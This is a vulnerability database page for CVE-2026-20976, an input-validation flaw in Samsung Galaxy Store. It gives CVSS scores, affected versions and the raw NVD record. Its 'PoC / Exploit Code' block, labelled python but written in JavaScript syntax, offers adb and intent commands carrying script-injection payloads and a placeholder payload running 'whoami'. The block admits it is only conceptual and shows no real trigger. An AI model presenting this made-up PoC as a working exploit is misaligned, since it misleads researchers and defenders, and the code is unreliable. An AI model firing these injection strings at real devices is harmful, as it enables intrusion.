Security Vulnerability Report
中文
CVE-2026-20976 CVSS 7.8 HIGH

CVE-2026-20976

Published: 2026-01-09 07:16:04
Last Modified: 2026-01-15 19:43:57

Description

Improper input validation in Galaxy Store prior to version 4.6.02 allows local attacker to execute arbitrary script.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:galaxy_store:*:*:*:*:*:*:*:* - VULNERABLE
Samsung Galaxy Store < 4.6.02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2026-20976 PoC - Galaxy Store Input Validation Bypass // Note: This is a conceptual PoC for demonstration purposes // Actual exploitation requires specific triggering mechanism // Method 1: Using ADB to trigger the vulnerable code path // adb shell am start -n com.sec.android.app.samsungapps/.Main // adb shell input text "<script>malicious_code_here</script>" // Method 2: Intent-based triggering (requires device access) // am start -a android.intent.action.VIEW \ // -d "galaxystore://search?q=<script>alert('XSS')</script>" // Method 3: Broadcast receiver exploitation // Local broadcast with malicious payload in extra data // This requires the attacker to have PR:L privileges // Conceptual payload structure: var payload = { action: "com.samsung.android.app.samsungapps.SEARCH", data: { query: "<script>\n// Arbitrary JavaScript/Shell code execution\nvar cmd = 'whoami';\n// Execute command via available APIs\n</script>" }, flags: ["FLAG_ACTIVITY_NEW_TASK"] }; // The vulnerability allows this payload to be processed // without proper sanitization, leading to code execution console.log("PoC for CVE-2026-20976 - Galaxy Store Input Validation");

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20976", "sourceIdentifier": "[email protected]", "published": "2026-01-09T07:16:04.263", "lastModified": "2026-01-15T19:43:57.340", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input validation in Galaxy Store prior to version 4.6.02 allows local attacker to execute arbitrary script."}, {"lang": "es", "value": "Validación de entrada indebida en Galaxy Store anterior a la versión 4.6.02 permite a un atacante local ejecutar script arbitrario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:galaxy_store:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.02.0", "matchCriteriaId": "78296F2B-472E-4071-998A-C387B773560C"}]}]}], "references": [{"url": "https://security.samsungmobile.com/serviceWeb.smsb?year=2026&month=01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}